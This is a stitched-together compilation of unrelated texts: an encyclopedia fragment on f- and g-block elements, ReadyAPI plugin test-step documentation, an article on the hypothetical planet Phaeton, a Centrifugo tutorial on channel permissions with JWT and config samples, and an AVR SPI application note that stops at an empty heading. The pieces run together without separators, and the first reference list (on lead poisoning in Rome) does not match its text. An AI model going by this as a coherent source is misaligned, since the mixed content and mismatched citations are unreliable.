The known f-block elements come in two series: the lanthanides of period 6 and the radioactive actinides of period 7. All are metals. Because the f-orbital electrons are less active in determining the chemistry of these elements, their chemical properties are mostly determined by the outer s-orbital electrons; consequently, there is much less chemical variability within the f-block than within the s-, p-, or d-blocks. F-block elements are unified by having one or more of their outermost electrons in the f orbital but none in the d or p orbitals. The f orbitals can contain up to seven pairs of electrons; hence, the block includes fourteen columns in the periodic table.

g-block

The g-block is a hypothetical block of elements in the extended periodic table whose outermost electrons are posited to include one or more g-orbital electrons but no f-, d- or p-orbital electrons.

References

1. Charles Janet, La classification hélicoïdale des éléments chimiques, Beauvais, 1928.
2. Lavelle, Laurence. "Lanthanum (La) and Actinium (Ac) Should Remain in the d-Block" (PDF). lavelle.chem.ucla.edu. Retrieved 9 November 2014.
3. Wilford, John Noble (17 March 1983). "Roman Empire's Fall Is Linked with Gout and Lead Poisoning". The New York Times. Retrieved 19 January 2016.
4. Killgrove, Kristina (20 January 2012). "Lead Poisoning in Rome – The Skeletal Evidence". Powered by Osteons. Retrieved 19 January 2016.
5. Sumner, Thomas (21 April 2014). "Did Lead Poisoning Bring Down Ancient Rome?". Science Magazine. Retrieved 19 January 2016.
@PluginTestStep

Applies to ReadyAPI 3.41, last modified on September 23, 2022

PluginTestStep creates a custom test step to be used in functional tests. It is usually combined with @PluginPanelBuilder to allow configuration of the step.

Property      Description
typeName      An internal id that uniquely identifies this test step type.
name          A human-readable name for the test step type.
description   A description of what the test step does.
iconPath      An icon to be shown in the toolbar. Optional, but recommended.

The annotated class must implement the TestStep interface (and usually extends WsdlTestStepWithProperties).

Sample Test Step

package com.smartbear.ready.plugin.template.factories;

import com.eviware.soapui.config.TestStepConfig;
import com.eviware.soapui.impl.wsdl.testcase.WsdlTestCase;
import com.eviware.soapui.impl.wsdl.teststeps.WsdlTestStepResult;
import com.eviware.soapui.impl.wsdl.teststeps.WsdlTestStepWithProperties;
import com.eviware.soapui.model.testsuite.TestCaseRunContext;
import com.eviware.soapui.model.testsuite.TestCaseRunner;
import com.eviware.soapui.model.testsuite.TestStepResult;
import com.eviware.soapui.plugins.auto.PluginTestStep;

@PluginTestStep(typeName = "SampleTestStep", name = "Sample TestStep",
        description = "A sample TestStep")
public class SampleTestStep extends WsdlTestStepWithProperties {

    public SampleTestStep(WsdlTestCase testCase, TestStepConfig config, boolean forLoadTest) {
        super(testCase, config, false, forLoadTest);
    }

    @Override
    public TestStepResult run(TestCaseRunner testRunner, TestCaseRunContext testRunContext) {
        // Report a successful result with a single message; a real step
        // would do its work here and set the result status accordingly.
        WsdlTestStepResult result = new WsdlTestStepResult(this);
        result.addMessage("Message");
        return result;
    }
}
Phaeton (hypothetical planet)

Phaeton (alternatively Phaethon or Phaëton) (/ˈfeɪ.əθən/; Ancient Greek: Φαέθων, romanized: Phaéthōn, pronounced [pʰa.é.tʰɔːn]) is a hypothetical planet posited by the Titius–Bode law to have existed between the orbits of Mars and Jupiter, whose destruction supposedly led to the formation of the asteroid belt (including the dwarf planet Ceres). The hypothetical planet was named after Phaethon, the son of the sun god Helios in Greek mythology, who attempted to drive his father's solar chariot for a day with disastrous results and was ultimately destroyed by Zeus.[1] Historically, however, the name was also used for Jupiter itself.[2]

Phaeton hypothesis

[Image: Sturz des Phaeton (Fall of the Phaeton) by Johann Michael Franz]
[Image: Heinrich Wilhelm Matthäus Olbers, who formulated the planet Phaeton hypothesis]

According to the Titius–Bode law, a planet was believed to exist between Mars and Jupiter. After learning of the regular sequence discovered by the German astronomer and mathematician J. D. Titius (1729–1796), astronomer Johann E. Bode urged a search for the fifth planet corresponding to the gap in the sequence. (1) Ceres, the largest asteroid in the asteroid belt (now considered a dwarf planet), was serendipitously discovered in 1801 by the Italian Giuseppe Piazzi and found to closely match the "empty" position in Titius' sequence, which led many to believe it to be the "missing planet". However, in 1802 astronomer Heinrich Wilhelm Matthäus Olbers discovered and named the asteroid (2) Pallas, a second object in roughly the same orbit as (1) Ceres. Olbers proposed that these two discoveries were fragments of a disrupted planet that had formerly orbited the Sun, and predicted that more of these pieces would be found. The discovery of the asteroids (3) Juno by Karl Ludwig Harding and (4) Vesta by Olbers buttressed his hypothesis.

In 1823, the German linguist and retired teacher Johann Gottlieb Radlof called Olbers' destroyed planet Phaëthon, linking it to the Greek myths and legends about Phaethon and others.[3]

In 1927, Franz Xaver Kugler wrote a short book titled Sibyllinischer Sternkampf und Phaëthon in naturgeschichtlicher Beleuchtung (The Sybilline Battle of the Stars and Phaeton Seen as Natural History).[4][5] The central idea of Kugler's book is that the myth of Phaethon was based on a real event: making use of ancient sources, Kugler argued that Phaeton had been a very bright celestial object that appeared around 1500 BC and fell to Earth not long afterwards as a shower of large meteorites, causing catastrophic fires and floods in Africa and elsewhere.[citation needed]

Hypotheses regarding the formation of the asteroid belt from the destruction of a hypothetical fifth planet are today collectively referred to as "the disruption theory". These hypotheses state that there was once a major planetary member of the Solar System circulating in the present gap between Mars and Jupiter, which was destroyed by one or more of the following hypothetical processes:[citation needed]

• it veered too close to Jupiter and was torn apart by its powerful tides
• it was struck by another large celestial body
• it was destroyed by a hypothetical brown dwarf, the companion star to the Sun, known as Nemesis
• it was shattered by some internal catastrophe

In 1953, the Soviet Russian astronomer Ivan I.
Putilin suggested that Phaeton was destroyed by centrifugal forces, giving it a diameter of approximately 6,880 kilometers (slightly larger than Mars' diameter of 6,779 km) and a rotation period of 2.6 hours. Eventually the planet became so distorted that parts of it near its equator were spun off into space. Outgassing of gases once stored in Phaeton's interior caused multiple explosions, sending material into space and forming asteroid families. However, his theory was not widely accepted. Two years later, in 1955, the Odessan astronomer Konstantin N. Savchenko suggested that Ceres, Pallas, Juno, and Vesta were not fragments of Phaeton but rather its former moons. Phaeton had an additional fifth satellite, assumed to be the size of Ceres, orbiting near the planet's Hill sphere and thus more subject to gravitational perturbations from Jupiter. As a result, the fifth satellite became tidally detached and orbited the Sun for millions of years afterward, making periodic close approaches to Phaeton that slowly increased its velocity. Once the escaped satellite re-entered Phaeton's Hill sphere, it collided with the planet at high speed, shattering it, while Ceres, Pallas, Juno, and Vesta assumed heliocentric orbits. Simulations showed that for such a Ceres-sized body to shatter Phaeton, it would need to be travelling at nearly 20 kilometers per second.[6]

The disrupted-planet hypothesis has also been supported by the French-Italian mathematician and astronomer Joseph-Louis Lagrange in 1814;[7] the Canadian geologist Reginald Daly in 1943;[8] the American geochemists Harrison Brown and Clair Patterson in 1948;[9] the Soviet academics Alexander Zavaritskiy in 1948, Vasily Fesenkov in 1950 (who later rejected his own model) and Otto Schmidt (died 1956);[6] the British-Canadian astronomer Michael Ovenden in 1972–73;[10][11] and the American astronomer Donald Menzel in 1978.[12] Ovenden suggested that the planet be named "Krypton", after the destroyed native world of Superman; he believed it to have been a gas giant of roughly eighty-five to ninety Earth masses, nearly the size of Saturn.[10]

Today the Phaeton hypothesis has been superseded by the accretion model.[13] Most astronomers now believe that the asteroids in the main belt are remnants of the protoplanetary disk that never formed a planet, and that in this region the amalgamation of protoplanets into a planet was prevented by the disruptive gravitational perturbations of Jupiter during the formative period of the Solar System.[citation needed]

Other hypotheses

Some scientists and non-scientists continue to advocate for the existence and destruction of a Phaeton-like planet. Zecharia Sitchin suggested that the goddess known to the Sumerians as Tiamat in fact relates to a planet that was destroyed by a rogue planet known as Nibiru, creating both Earth and the asteroid belt.[14] His work is widely regarded as pseudoscience.[15]

The astronomer and author Tom Van Flandern held that Phaeton (which he called "Planet V", with V representing the Roman numeral for five, and not to be confused with the other postulated former fifth planet not attributed to the formation of the asteroid belt) exploded through some internal mechanism. In his "Exploded Planet Hypothesis 2000" he lists possible causes for its explosion: a runaway nuclear reaction of uranium in its core, a change of state as the planet cooled down creating a density phase change, or continual absorption of heat in the core from gravitons.
Van Flandern even suggested that Mars itself may have been a moon of Planet V, given its craters hinting at exposure to meteorite storms and its relatively low density compared to the other inner planets.[16][17][18]

In 1972, Soyuzmultfilm studios produced an animated short film titled Phaeton: The Son of Sun (Russian: Фаэтон – Сын Солнца), directed by Vasiliy Livanov, in which the asteroid belt is portrayed as the remains of a planet. The film also contains numerous references to ancient astronauts.[19]

Phaeton in literature

Several works of fiction feature a supposed planet (sometimes named Phaeton or Maldek) existing in the past between the orbits of Mars and Jupiter, which somehow became the Solar System's asteroid belt.

References

1. Chisholm, Hugh, ed. (1911). "Phaëthon". Encyclopædia Britannica. Vol. 21 (11th ed.). Cambridge University Press. p. 342.
2. Cicero, De Natura Deorum.
3. Radlof, Johann Gottlieb (1823). Zertrümmerung der großen Planeten Hesperus und Phaeton, und darauf folgenden Zerstörungen und Ueberflutung auf der Erde. Berlin: G. Reimer. p. 59.
4. Kugler, Franz Xaver (1927). Sibyllinischer Sternkampf und Phaëthon in naturgeschichtlicher Beleuchtung [The Sybilline Battle of the Stars and Phaeton Seen as Natural History] (in German).
5. "Sybilline Battle of the Stars". anticariateleph.ro.
6. Bronshten, V. A. (May 1972). Origin of the Asteroids. Zemlya i Vselennaya. Retrieved 22 March 2017.
7. Lagrange, J. L. (1814). Sur l'origine des comètes. Connaissance des temps pour l'an 1814. p. 211.
8. Dodd, Robert (1986). Thunderstones and Shooting Stars. Harvard University Press. p. 54.
9. Brown, H.; Patterson, C. (1948). "The composition of meteoritic matter III". Journal of Geology. 56: 85–111. doi:10.1086/625489.
10. Ovenden, M. W. (1972). "Bode's law and the missing planet". Nature. 239: 508–509. doi:10.1038/239508a0.
11. Ovenden, M. W. (1973). "Planetary Distances and the Missing Planet". Recent Advances in Dynamic Astronomy. Reidel. pp. 319–332.
12. Menzel, Donald (1978). Guide des Étoiles et Planètes [A Field Guide to the Stars and Planets]. Les Guides du Naturaliste. Translated by Egger, M.; Egger, F. (2nd ed.). Paris: Delachaux et Niestlé; Houghton-Mifflin. p. 315. "Presque toutes ces petites planètes circulent entre les orbites de Mars et Jupiter. On admet qu'elles représentent les fragments dispersés d'une grande planète qui se serait désintégrée" ["Almost all these minor planets orbit between Mars and Jupiter. It is accepted that they represent the scattered fragments of a large planet that supposedly disintegrated."]
13. "Ask an Astrophysicist". imagine.gsfc.nasa.gov. Archived from the original on 2 November 2014.
14. Sitchin, Zecharia (1990). "Chapter 2: It Came From Outer Space". Genesis Revisited. New York: Avon Books. ISBN 978-0380761593.
15. Carroll, Robert T. (1994–2009). "Zecharia Sitchin and The Earth Chronicles". The Skeptic's Dictionary. John Wiley & Sons. Retrieved 5 February 2016.
16. Van Flandern, Tom C. (2000). "The Exploded Planet Hypothesis 2000". Meta Research. Archived from the original on 2002-11-21.
17. Van Flandern, Tom C. (2007). "The challenge of the exploded planet hypothesis". International Journal of Astrobiology. 6 (3): 185–197. doi:10.1017/S1473550407003758.
18. Van Flandern, Tom C. (1999). Dark Matter, Missing Planets, and New Comets: Paradoxes Resolved, Origins Illuminated. North Atlantic Books. ISBN 9781556432682.
19. Российская анимация в буквах и фигурах | Фильмы | «Фаэтон – сын Солнца» [Russian animation in letters and figures | Films | "Phaeton: The Son of the Sun"] (in Russian).
101 ways to subscribe user on a personal channel in Centrifugo · 11 min read

Alexander Emelin

Let's say you develop an application and want a real-time connection which is subscribed to one channel. Let's also assume that this channel is used for user personal notifications. So only one user in the application can subscribe to that channel to receive its notifications in real-time. In this post we will look at various ways to achieve this with Centrifugo, and consider the trade-offs of the available approaches.

The main goal of this tutorial is to help Centrifugo newcomers be aware of all the ways to control channel permissions by reading just one document. And... well, there are actually 8 ways I found, not 101 😇

Setup

To make the post a bit easier to consume, let's set up some things. Let's assume that the user for which we provide all the examples in this post has ID "17". Of course, in real life the examples given here can be extrapolated to any user ID.

When you create a real-time connection to Centrifugo, the connection is authenticated in one of the following ways:

• using a connection JWT
• using a connection request proxy from Centrifugo to the configured endpoint of the application backend (connect proxy)

As soon as the connection is successfully established and authenticated, Centrifugo knows the ID of the connected user. This is important to understand.

Let's also define a namespace in the Centrifugo configuration which will be used for personal user channels:

{
    ...
    "namespaces": [
        {
            "name": "personal",
            "presence": true
        }
    ]
}

Defining a namespace for each new real-time feature is a good practice in Centrifugo. As an improvement we also enabled presence in the personal namespace, so whenever users subscribe to a channel in this namespace, Centrifugo will maintain online presence information for it, and you can find all connections of a specific user existing at any moment. Presence is fully optional though: turn it off if you don't need the information and don't want to spend additional server resources on maintaining it.

#1 – user-limited channel

Tip: probably the most performant approach.

All you need to do is to extend the namespace configuration with the allow_user_limited_channels option:

{
    "namespaces": [
        {
            "name": "personal",
            "presence": true,
            "allow_user_limited_channels": true
        }
    ]
}

On the client side you need something like this (of course, the ID of the current user will be dynamic in real life):

const sub = centrifuge.newSubscription('personal:#17');
sub.on('publication', function(ctx) {
    console.log(ctx.data);
})
sub.subscribe();

Here you are subscribing to a channel in the personal namespace and listening to publications coming from the channel. Having # in the channel name tells Centrifugo that this is a user-limited channel (# is a special symbol treated this way as soon as allow_user_limited_channels is enabled). In this case the user ID part of the user-limited channel is "17", so Centrifugo allows the user with ID "17" to subscribe to personal:#17; other users won't be able to subscribe to it.

To publish updates to the subscription, all you need to do is publish to personal:#17 using the server publish API (HTTP or GRPC), as sketched below.
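For completeness, here is a minimal sketch of such a backend publish call in Python. The single /api endpoint with a method/params body shown here is the v3/v4-style server HTTP API; newer Centrifugo versions also expose per-method endpoints, so check the server API docs for your version. The API key value is a placeholder for the api_key from your Centrifugo config:

import requests

resp = requests.post(
    "http://localhost:8000/api",
    json={
        "method": "publish",
        "params": {
            "channel": "personal:#17",   # user-limited channel of user "17"
            "data": {"text": "new personal notification"},
        },
    },
    headers={"Authorization": "apikey <API_KEY_FROM_CONFIG>"},
)
resp.raise_for_status()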
#2 – channel token authorization

Tip: probably the most flexible approach, with reasonably good performance characteristics.

Another way we will look at is using a subscription JWT for subscribing. When you create a Subscription object on the client side, you can pass it a subscription token, and also provide a function to retrieve the subscription token (useful to automatically handle token refresh; it also handles initial token loading).

const token = await getSubscriptionToken('personal:17');

const sub = centrifuge.newSubscription('personal:17', { token: token });
sub.on('publication', function(ctx) {
    console.log(ctx.data);
})
sub.subscribe();

Inside getSubscriptionToken you can issue a request to the backend; in the browser this can be done with the fetch API, for example. On the backend side you know the ID of the current user due to the native session mechanism of your app, so you can decide whether the current user has permission to subscribe to personal:17 or not. If yes, return a subscription JWT according to our rules. If not, return an empty string, so the subscription goes to the unsubscribed state with an unauthorized reason.

Here is an example of generating a subscription HMAC SHA-256 JWT for the channel personal:17 and the HMAC secret key secret:

import jwt
import time

claims = {
    "sub": "17",
    "channel": "personal:17",
    "exp": int(time.time()) + 30*60
}

# PyJWT 2.x returns a str, so no .decode() call is needed.
token = jwt.encode(claims, "secret", algorithm="HS256")
print(token)

Since we set an expiration time for subscription JWTs, we also need to provide a getToken function to the client on the frontend side:

const sub = centrifuge.newSubscription('personal:17', {
    getToken: async function (ctx) {
        const token = await getSubscriptionToken('personal:17');
        return token;
    }
});
sub.on('publication', function(ctx) {
    console.log(ctx.data);
})
sub.subscribe();

This function will be called by the SDK automatically to refresh the subscription token when it's about to expire. Note that we omitted the token option here, since the SDK is smart enough to call the provided getToken function to get the initial subscription token from the backend.

The good thing about the subscription JWT approach is that you can set a token expiration time, so permissions to subscribe to a channel are re-validated from time to time while the connection is active. You can also attach additional channel context info to presence information (using the info claim of the subscription JWT). And you can granularly control channel permissions using the allow claim of the token, giving the client capabilities to publish or to call history and presence (this is a Centrifugo PRO feature at this point). A token also allows overriding some namespace options on a per-subscription basis (with the override claim).

Using subscription tokens is a general approach for any channel where you need to check access first, not only for personal user channels.

#3 – subscribe proxy

Tip: probably the most secure approach.

A subscription JWT gives the client a way to subscribe to a channel while avoiding a request to your backend for permission on every resubscribe. The token approach is very good in a massive reconnect scenario, when many connections resubscribe at once (due to your load balancer reload, for example). But this also means that if you unsubscribed a client from a channel using the server API, the client can still resubscribe with the token again, until the token expires. In some cases you may want to avoid this. Also, in some cases you want to be notified when someone subscribes to a channel. In those cases you may use the subscribe proxy feature. When using subscribe proxy, every attempt of a client to subscribe to a channel is translated into a request (HTTP or GRPC) from Centrifugo to the application backend; a sketch of such a backend handler follows below.
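Jumping slightly ahead of the configuration shown below, a minimal HTTP subscribe proxy handler might look like the following Flask sketch. The request/response field names and the error code follow the conventions of the Centrifugo proxy docs but should be verified for your Centrifugo version, and the permission check itself is a hypothetical stand-in:

from flask import Flask, jsonify, request

app = Flask(__name__)

def user_can_access(user_id, channel):
    # Hypothetical rule: the personal channel suffix must match the user ID.
    return channel == "personal:" + user_id

@app.post("/centrifugo/subscribe")
def centrifugo_subscribe():
    body = request.get_json()
    user, channel = body["user"], body["channel"]
    if user_can_access(user, channel):
        # An empty result allows the subscription; a "data" field inside
        # "result" could carry initial channel data, as described below.
        return jsonify({"result": {}})
    return jsonify({"error": {"code": 103, "message": "permission denied"}})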
The application backend can decide whether the client is allowed to subscribe or not. One advantage of using subscribe proxy is that the backend can additionally provide initial channel data for the subscribing client. This is possible using the data field of the subscribe result generated by the backend subscribe handler.

{
    "proxy_subscribe_endpoint": "http://localhost:9000/centrifugo/subscribe",
    "namespaces": [
        {
            "name": "personal",
            "presence": true,
            "proxy_subscribe": true
        }
    ]
}

On the backend side, define a route /centrifugo/subscribe (as in the sketch above), check the user's permissions upon subscription, and return the result to Centrifugo according to our subscribe proxy docs. Or simply run a GRPC server using our proxy definitions and react to subscription attempts sent from Centrifugo to the backend over GRPC.

On the client side the code is as simple as:

const sub = centrifuge.newSubscription('personal:17');
sub.on('publication', function(ctx) {
    console.log(ctx.data);
})
sub.subscribe();

#4 – server-side channel in connection JWT

Tip: the approach where you don't need to manage client-side subscriptions.

Server-side subscriptions are a way to consume publications from channels without even creating Subscription objects on the client side. In general, client-side Subscription objects provide a more flexible and controllable way to work with subscriptions: clients can subscribe and unsubscribe to channels at any point, and client-side subscriptions provide more details about state transitions. With server-side subscriptions, though, you consume publications directly from the Client instance:

const client = new Centrifuge('ws://localhost:8000/connection/websocket', {
    token: 'CONNECTION-JWT'
});

client.on('publication', function(ctx) {
    console.log('publication received from server-side channel', ctx.channel, ctx.data);
});

client.connect();

In this case you don't have separate Subscription objects, and upon receiving a publication you need to look at ctx.channel (or at the publication content) to decide how to handle it. Server-side subscriptions can be a good choice if you are using Centrifugo's unidirectional transports and don't need dynamic subscribe/unsubscribe behavior.

The first way to subscribe a client to a server-side channel is to include a channels claim in the connection JWT:

{
    "sub": "17",
    "channels": ["personal:17"]
}

Upon successful connection the user will be subscribed to the server-side channel by Centrifugo. One downside of using server-side channels is that errors in one server-side channel (for example, when missed messages cannot be recovered) may affect the entire connection and result in reconnects, while with client-side subscriptions individual subscription failures do not affect the entire connection. But having one server-side channel per connection seems a very reasonable idea in many cases. And if you have a stable set of subscriptions which does not require lifetime state management, this can be a nice approach without additional protocol/network overhead.

#5 – server-side channel in connect proxy

Similar to the previous one, for cases when you are authenticating connections over connect proxy instead of using JWT. This is possible using the channels field of the connect proxy handler result. The code on the client side is the same as in option #4, since we only change the way the list of server-side channels is provided.

#6 – automatic personal channel subscription

Tip: an almost-no-code approach.

As pointed out above, Centrifugo knows the ID of the user from the authentication process.
So why not combine this knowledge with an automatic server-side personal channel subscription? Centrifugo provides exactly this with the user personal channel feature.

{
    "user_subscribe_to_personal": true,
    "user_personal_channel_namespace": "personal",
    "namespaces": [
        {
            "name": "personal",
            "presence": true
        }
    ]
}

This feature only subscribes non-anonymous users (those with a non-empty user ID) to personal channels. The configuration above will subscribe our user "17" to the channel personal:#17 automatically after successful authentication.

#7 – capabilities in connection JWT

Allows using client-side subscriptions while skipping the subscription token. This is only available in Centrifugo PRO at this point.

When generating the connection JWT, you can provide an additional caps claim which contains channel resource capabilities:

import jwt
import time

claims = {
    "sub": "17",
    "exp": int(time.time()) + 30*60,
    "caps": [
        {
            "channels": ["personal:17"],
            "allow": ["sub"]
        }
    ]
}

# PyJWT 2.x returns a str, so no .decode() call is needed.
token = jwt.encode(claims, "secret", algorithm="HS256")
print(token)

While in the case of a single channel the benefit of this approach is not really obvious, it can help when you are using several channels with strict access permissions per connection: providing capabilities saves some traffic and CPU resources, since we avoid generating a subscription token for each individual channel.

#8 – capabilities in connect proxy

This is very similar to the previous approach, but the capabilities are passed to Centrifugo in the connect proxy result. So if you are using connect proxy for auth, you can still provide capabilities in the same form as in the JWT. This is also a Centrifugo PRO feature.

Teardown

Which way to choose? Well, it depends. Since your application will in many cases have more than just a personal user channel, you should decide which approach suits each particular case best; it's hard to give universal advice.

Client-side subscriptions are more flexible in general, so I'd suggest using them whenever possible. But you may be using Centrifugo's unidirectional transports, where subscribing to channels from the client side is not simple to achieve (though still possible using our server subscribe API); server-side subscriptions make more sense there.

The good news is that all our official bidirectional client SDKs support all the approaches mentioned in this post. Hope designing the channel configuration on top of Centrifugo will be a pleasant experience for you.
Using the SPI protocol

General description of the SPI

The SPI allows high-speed synchronous data transfer between the AVR and peripheral devices or between several AVR devices. On most parts the SPI has a second purpose: it is used for In-System Programming (ISP).

The interconnection between two SPI devices always happens between a master device and a slave device. Unlike some peripheral devices such as sensors, which can only run in slave mode, the SPI of the AVR can be configured for both master and slave mode. The mode the AVR runs in is specified by the setting of the master bit (MSTR) in the SPI control register (SPCR).

Special considerations about the /SS pin have to be taken into account; these are described later in the section "Multi-slave systems – /SS pin functionality".

The master is the active part in this system and has to provide the clock signal on which the serial data transmission is based. The slave is not capable of generating the clock signal and thus cannot become active on its own. The slave sends and receives data only if the master generates the necessary clock signal. The master, however, generates the clock signal only while sending data. That means that the master has to send data to the slave in order to read data from the slave.

[Figure 1: SPI master–slave interconnection]

Data transmission between master and slave

The interaction between a master and a slave AVR is shown in Figure 1. Two identical SPI units are displayed; the left unit is configured as master and the right unit as slave. The MISO, MOSI and SCK lines are connected to the corresponding lines of the other part. The mode in which a part is running determines whether these lines are inputs or outputs. Because a bit is shifted from the master to the slave and from the slave to the master simultaneously in each clock cycle, the two 8-bit shift registers can be considered as one 16-bit circular shift register. This means that after eight SCK clock pulses the data held by master and slave are exchanged.

The system is single-buffered in the transmit direction and double-buffered in the receive direction. This influences data handling in the following ways:

1. New bytes to be sent cannot be written to the data register (SPDR) / shift register before the entire shift cycle is completed.
2. Received bytes are written to the receive buffer immediately after the transmission is completed.
3. The receive buffer has to be read before the next transmission is completed, or data will be lost.
4. Reading the SPDR returns the data of the receive buffer.

After a transfer is completed, the SPI interrupt flag (SPIF) is set in the SPI status register (SPSR). This causes the corresponding interrupt to be executed if this interrupt and the global interrupts are enabled. Setting the SPI interrupt enable (SPIE) bit in the SPCR enables the interrupt of the SPI, while setting the I bit in the SREG enables the global interrupts.

Pins of the SPI

The SPI consists of four different signal lines: the shift clock (SCK), the Master Out Slave In line (MOSI), the Master In Slave Out line (MISO), and the active-low slave select line (/SS). When the SPI is enabled, the data direction of the MOSI, MISO, SCK and /SS pins is overridden as shown in Table 1 below.
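Before moving on to the pin table: the circular exchange described in the "Data transmission" section above is easy to model. The following Python sketch (an illustration only, not AVR code) mimics the combined 16-bit shift register; after eight clock pulses the two bytes are swapped, which is why a master must transmit a byte, even a dummy one, in order to read one from the slave:

def spi_exchange(master_byte, slave_byte):
    """Simulate one 8-bit SPI transfer; returns the new register contents."""
    for _ in range(8):                        # one SCK pulse per bit
        master_out = (master_byte >> 7) & 1   # MSB leaves the master on MOSI
        slave_out = (slave_byte >> 7) & 1     # MSB leaves the slave on MISO
        master_byte = ((master_byte << 1) & 0xFF) | slave_out
        slave_byte = ((slave_byte << 1) & 0xFF) | master_out
    return master_byte, slave_byte            # contents are now exchanged

assert spi_exchange(0xA5, 0x3C) == (0x3C, 0xA5)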
Table 1. SPI pin overrides

Pin     Direction override, master SPI mode     Direction override, slave SPI mode
MOSI    User defined                            Input
MISO    Input                                   User defined
SCK     User defined                            Input
/SS     User defined                            Input

This table shows that only the input pins are automatically configured. The output pins have to be initialized manually by software; the reason for this is to avoid damage, e.g. through driver contention.

Multi-slave systems – /SS pin functionality

The slave select (/SS) pin plays a central role in the SPI configuration. Depending on the mode the part is running in and the configuration of this pin, it can be used to activate or deactivate devices. The /SS pin can be compared to a chip-select pin with some extra features. In master mode, the /SS pin must be held high to ensure master SPI operation if this pin is configured as an input pin. A low level will switch the SPI into slave mode, and the SPI hardware will perform the following actions:

1. The master bit (MSTR) in the SPI control register (SPCR) is cleared and the SPI system becomes a slave. The direction of the pins is switched according to Table 1.
2. The SPI interrupt flag (SPIF) in the SPI status register (SPSR) is set. If the SPI interrupt and the global interrupts are enabled, the interrupt routine will be executed.

This can be useful in systems with more than one master, to prevent two masters from accessing the SPI bus at the same time. If the /SS pin is configured as an output pin, it can be used as a general-purpose output pin which does not affect the SPI system.

Note: in cases where the AVR is configured for master mode and it cannot be ensured that the /SS pin stays high between two transmissions, the status of the MSTR bit has to be checked before a new byte is written. Once the MSTR bit has been cleared by a low level on the /SS line, it must be set again by the application to re-enable SPI master mode.

In slave mode the /SS pin is always an input. When /SS is held low, the SPI is activated and MISO becomes an output if so configured by the user; all other pins are inputs. When /SS is driven high, all pins are inputs and the SPI is passive, which means that it will not receive incoming data.

Table 2 gives an overview of the /SS pin functionality.

Note: in slave mode, the SPI logic is reset once the /SS pin is brought high. If the /SS pin is brought high during a transmission, the SPI stops sending and receiving immediately, and both the data received and the data sent must be considered lost.

Table 2. Overview of the /SS pin

Mode     /SS config      /SS pin level    Description
Slave    Always input    High             Slave deactivated
                         Low              Slave activated
Master   Input           High             Master activated
                         Low              Master deactivated
Master   Output          High             Master activated
                         Low              Master activated

As shown in Table 2, the /SS pin in slave mode is always an input pin: a low level activates the SPI of the device, while a high level deactivates it. A single-master, multiple-slave system with an AVR configured in master mode and /SS configured as an output pin is shown in Figure 2. The number of slaves which can be connected to this AVR is only limited by the number of I/O pins available to generate the slave select signals.

[Figure 2: single-master, multiple-slave SPI system]

The ability to connect several devices to the same SPI bus is based on the fact that only one master and only one slave are active at the same time. The MISO, MOSI and SCK lines of all the other slaves are tri-stated (configured as high-impedance input pins with no pull-up resistors enabled).
A false implementation (e.g. two slaves activated at the same time) can cause driver contention, which can lead to a CMOS latch-up state and must be avoided. Resistors of 1 to 10 kΩ in series with the pins of the SPI can be used to protect the system from latching up; however, this affects the maximum usable data rate, depending on the loading capacitance on the SPI pins.

Unidirectional SPI devices require just the clock line and one of the data lines. Whether a device uses the MISO line or the MOSI line depends on its purpose: simple sensors, for instance, only send data (see S2 in Figure 2), while an external DAC usually only receives data (see S3 in Figure 2).

SPI timing

The SPI has four modes of operation, 0 through 3. These modes essentially control the way data is clocked into or out of an SPI device. The configuration is done by two bits in the SPI control register (SPCR): the clock polarity is specified by the CPOL control bit, which selects an active-high or active-low clock, and the clock phase (CPHA) control bit selects one of two fundamentally different transfer formats. To ensure proper communication between master and slave, both devices have to run in the same mode. This can require a reconfiguration of the master to match the requirements of different peripheral slaves.

The settings of CPOL and CPHA specify the different SPI modes, as shown in Table 3. Because this numbering is not a standard and is specified differently in other literature, the configuration of the SPI has to be done carefully.

Table 3. SPI mode configuration

SPI mode    CPOL    CPHA    Shift SCK edge    Capture SCK edge
0           0       0       Falling           Rising
1           0       1       Rising            Falling
2           1       0       Rising            Falling
3           1       1       Falling           Rising

The clock polarity has no significant effect on the transfer format: switching this bit causes the clock signal to be inverted (active high becomes active low, and idle low becomes idle high). The setting of the clock phase, however, selects one of the two different transfer timings, which are described more closely in the next two sections. Since the MOSI and MISO lines of the master and the slave are directly connected to each other, the diagrams show the timing of both devices, master and slave. The /SS line is the slave select input of the slave. The /SS pin of the master is not shown in the diagrams; it has to be kept inactive, either by a high level on this pin (if configured as an input pin) or by configuring it as an output pin.

A.) CPHA = 0 with CPOL = 0 (mode 0) and CPHA = 0 with CPOL = 1 (mode 2)

The timing of an SPI transfer where CPHA is zero is shown in Figure 3. Two waveforms are shown for the SCK signal: one for CPOL = 0 and another for CPOL = 1.

[Figure 3: SPI transfer timing with CPHA = 0]

When the SPI is configured as a slave, the transmission starts with the falling edge of the /SS line. This activates the SPI of the slave, and the MSB of the byte stored in its data register (SPDR) is output on the MISO line. The actual transfer is started by a software write to the SPDR of the master, which causes the clock signal to be generated. In cases where CPHA equals zero, the SCK signal remains zero for the first half of the first SCK cycle. This ensures that the data is stable on the input lines of both the master and the slave. The data on the input lines is read on the edge of the SCK line from its inactive to its active state (rising edge if CPOL equals zero, falling edge if CPOL equals one).
The edge of the SCK line from its active to its inactive state (falling edge if CPOL equals zero, rising edge if CPOL equals one) causes the data to be shifted one bit further, so that the next bit is output on the MOSI and MISO lines.

After eight clock pulses the transmission is completed. In both the master and the slave device the SPI interrupt flag (SPIF) is set, and the received byte is transferred to the receive buffer.

B.) CPHA = 1 with CPOL = 0 (mode 1) and CPHA = 1 with CPOL = 1 (mode 3)

The timing of an SPI transfer where CPHA is one is shown in Figure 4. Two waveforms are shown for the SCK signal: one for CPOL = 0 and another for CPOL = 1.

[Figure 4: SPI transfer timing with CPHA = 1]

As in the previous cases, the falling edge of the /SS line selects and activates the slave. Compared to the previous cases, where CPHA equals zero, the transmission is not started and the MSB is not output by the slave at this stage. The actual transfer is started by a software write to the SPDR of the master, which causes the clock signal to be generated. The first edge of the SCK signal from its inactive to its active state (rising edge if CPOL equals zero, falling edge if CPOL equals one) causes both the master and the slave to output the MSB of the byte in the SPDR.

As shown in Figure 4, there is no delay of half an SCK cycle as in the CPHA = 0 modes: the SCK line changes its level immediately at the beginning of the first SCK cycle. The data on the input lines is read on the edge of the SCK line from its active to its inactive state (falling edge if CPOL equals zero, rising edge if CPOL equals one).

After eight clock pulses the transmission is completed. In both the master and the slave device the SPI interrupt flag (SPIF) is set, and the received byte is transferred to the receive buffer.

Considerations for high-speed transmissions

